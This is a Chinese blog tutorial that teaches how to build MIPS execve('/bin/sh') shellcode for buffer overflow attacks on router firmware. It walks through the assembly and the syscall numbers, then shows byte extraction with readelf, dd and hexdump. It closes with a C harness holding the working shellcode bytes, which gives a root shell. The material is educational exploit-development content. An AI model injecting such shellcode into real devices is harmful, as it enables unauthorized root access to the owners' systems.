狭义上得Shellcode是指,向进程植入的一段用于获取Shell的代码,事实上,如今的Shellcode所具备的功能已经不仅仅包括获取Shell,还包括开启端口、执行命令等。
Shellcode通常使用汇编语言编写,最终将其转换成机器可识别的二进制机器码,其内容和长度还会受到很多苛刻的限制,因此开发和调试的难度非常高。
Shellcode编写好后,通常在程序的可注入点,将Shellcode注入到目标进程中,并通过缓冲区溢出漏洞,使程序跳转到Shellcode执行。这些可注入的点可能是word文档中输入的数据,也可能是在浏览器中输入的网页地址,也能是web服务器接收的http请求数据,也可能是某程序从特定文件中读取的数据。
在编写Shellcode时,通常会使用一些系统调用函数以完成特定的功能,比如调用execve系统调用来执行一个命令,又比如调用socket系列函数来发起tcp连接。所以,我们应该首先熟悉常用的系统调用函数,和在汇编代码层面如何发起系统调用。
比如execve系统调用,可以用来在C代码中执行系统命令:
#include <stdio.h>
#include <unistd.h>
int main() {
char *program = "/bin/sh";
char *args[2];
args[0] = program;
args[1] = 0;
execve(program, args, 0);
return 0;
}
通过文稿中这几行简短的C代码,读者就可以明白execve函数的用处。
有时候在路由器的固件中,可能会存在telnetd服务命令程序,但却没有被启动,若攻击者通过缓冲区溢出漏洞,注入一段调用了execve系统调用的Shellcode,那么这段Shellcode就可以把原本没有执行的telnetd命令给执行起来,这样,就通过缓冲区溢出完成了一个远程命令执行。
对照这个C代码,我们可以尝试写出对应的汇编代码:
.section .text
.globl __start
.set noreorder
__start:
li $a2, 0x111
p:bltzal $a2, p
li $a2, 0
addiu $sp, $sp, -32
addiu $a0, $ra, 28
sw $a0, -24($sp)
sw $zero, -20($sp)
addiu $a1, $sp, -24
li $v0, 4011
syscall
sc:
.byte 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68
第5行,设置a2=0x111。
第6行bltz意思是当less than zero时,跳转到p位置,且将ra寄存器指向第8行的指令。
从第8行开始,开始准备调用execve系统调用所使用的参数,分别是a0、a1、a2,其中a2为0,读者可以对比汇编代码的第7行和C代码的第10行。
第9行,使a0指向了,从第8行开始(ra指向的位置)向后偏移28字节的位置,由于每条mips汇编指令是4字节,所以向后偏移28字节的位置正好的sc标签指向的位置,也就是字符串“/bin/sh”所在的位置。也就是汇编代码的最后一行。
第10行~第12行,将栈空间的$sp-24位置的内存作为一个字符串数组,数组的第一个元素存储的是a0,也就是字符串“/bin/sh”,而数组的第二个元素则为零。最终在第12行,将这个字符串数组用a1进行保存。
这样调用execve系统调用的三个参数就都准备好了。
参数准备好后,将代表execve系统调用的系统调用号(4011)存入v0寄存器,最后调用syscall指令完成系统调用。
这里你可能会有疑问,4011是怎么来的呢?
其实在开源的Linux内核代码中已经指明了每个系统调用对应的系统调用号,源码文件在Linux内核代码的/usr/include/mips-linux-gnu/asm/unistd.h位置。如果你要开发基于MIPS的其他系统调用相关的Shellcode,可以参考这个文件来寻找对应的系统调用号。
在我们前面搭建好的mips-debian系统中已经存在了这个unistd.h文件:
/*
* Linux o32 style syscalls are in the range from 4000 to 4999.
*/
#define __NR_Linux 4000
#define __NR_syscall (__NR_Linux + 0)
#define __NR_exit (__NR_Linux + 1)
#define __NR_fork (__NR_Linux + 2)
#define __NR_read (__NR_Linux + 3)
#define __NR_write (__NR_Linux + 4)
#define __NR_open (__NR_Linux + 5)
#define __NR_close (__NR_Linux + 6)
#define __NR_waitpid (__NR_Linux + 7)
#define __NR_creat (__NR_Linux + 8)
#define __NR_link (__NR_Linux + 9)
#define __NR_unlink (__NR_Linux + 10)
#define __NR_execve (__NR_Linux + 11)
通过头文件,我们可以计算得到execve系统调用号是4000+11,也就是4011。
我们理解了这段汇编代码以后,在mips-debian系统中使用编译器编译这个汇编程序运行测试一下:
.../shellcode# as exec_mysh.S -o mysh.o
.../shellcode# ld mysh.o -o mysh
.../shellcode# ./mysh
# id
uid=0(root) gid=0(root) groups=0(root)
#
可以看到,运行这段汇编代码编译的程序,我们就成功获取到了一个shell。而获取到的这个shell,具备了与mysh进程相同的权限,即root权限。
当然,我们不可能直接将这个汇编代码编译成的mysh程序直接作为攻击载荷投放到存在缓冲区溢出的进程中。我们应该进一步的从mysh程序中提取出具体的二进制指令,然后再将提取到的二进制指令数据进行投放。
那具体如何提取呢。
我们先使用readelf命令查看程序的各个段地址:
.../shellcode# readelf -S mysh
There are 8 section headers, starting at offset 0x2ac:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .MIPS.abiflags MIPS_ABIFLAGS 00400098 000098 000018 18 A 0 0 8
[ 2] .reginfo MIPS_REGINFO 004000b0 0000b0 000018 18 A 0 0 4
[ 3] .text PROGBITS 004000d0 0000d0 000030 00 AX 0 0 16
[ 4] .gnu.attributes LOOS+0xffffff5 00000000 000100 000010 00 0 0 1
[ 5] .symtab SYMTAB 00000000 000110 000110 10 6 10 4
[ 6] .strtab STRTAB 00000000 000220 000041 00 0 0 1
[ 7] .shstrtab STRTAB 00000000 000261 000049 00 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
p (processor specific)
root@bogon:~/dir-619l/shellcode#
其中,.text也就是代码段在mysh文件的0x0000d0位置,大小是0x30。
这样,我们就可以使用dd命令将这个0x30个字节的指令数据提取出来:
# dd if=mysh of=mysh.ins bs=1 skip=208 count=48
48+0 records in
48+0 records out
48 bytes copied, 0.0104498 s, 4.6 kB/s
我们将提取出来的mysh.ins文件取出来,使用ida打开,处理器类型设置为mips大端,然后在打开的窗口的00000000地址处使用“C”快捷键,就将这段看不出有什么含义的二进制数据转换为MIPS汇编指令了:
使用hexdump工具,可以查看这个文件的二进制数据:
# hexdump mysh.ins
0000000 2406 0111 04d0 ffff 2406 0000 27bd ffe0
0000010 27e4 001c afa4 ffe8 afa0 ffec 27a5 ffe8
0000020 2402 0fab 0000 000c 2f62 696e 2f73 6800
0000030
这其中的每4个字节对应了一条汇编指令,比如开头的24060111就对应了li $a2, 0x111指令。
最后我们将这段指令使用C语言的数组包装起来,然后用一个函数指针指向这个数组,尝试执行一下:
#include <stdio.h>
char sc2[] = {
"\x24\x06\x01\x11"
"\x04\xd0\xff\xff"
"\x24\x06\x00\x00"
"\x27\xbd\xff\xe0"
"\x27\xe4\x00\x1c"
"\xaf\xa4\xff\xe8"
"\xaf\xa0\xff\xec"
"\x27\xa5\xff\xe8"
"\x24\x02\x0f\xab"
"\x00\x00\x00\x0c"
"/bin/sh"
};
void main(void)
{
void(*s)(void);
printf("size: %d\n", strlen(sc2));
s = sc2;
s();
}
root@bogon:~# gcc test_sc.c
root@bogon:~# ./a.out
size: 10
# id
uid=0(root) gid=0(root) groups=0(root)
#
上面的C代码将提取到的二进制Shellcode指令存储到了字符数组中,然后使用一个函数指针指向了个数组在内存中的首地址。然后使用函数调用的方式执行了这个数组中代表的指令。
由上面的shell命令输出我们可以知道。一段完整的Shellcode已经开发完成了。
接下要解决的问题就是如何将这段shellcode投放到带有缓冲区溢出的进程中,然后执行它。
但是,距离最后执行这段shellcode这个目的,还存在一点点的工作要做,就是shellcode中的坏字符问题,也就是shellcode中存在诸如0x00的问题,这上面的C代码中,我们使用了strlen函数计算了一下数组的长度,通过程序的运行输出,我们会明显发现输出的10不是指令数组的真实长度,在下次的分享中,我会对这个问题进行继续分享。
最后,希望这次的分享能够为你带来帮助,谢谢大家。
896
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
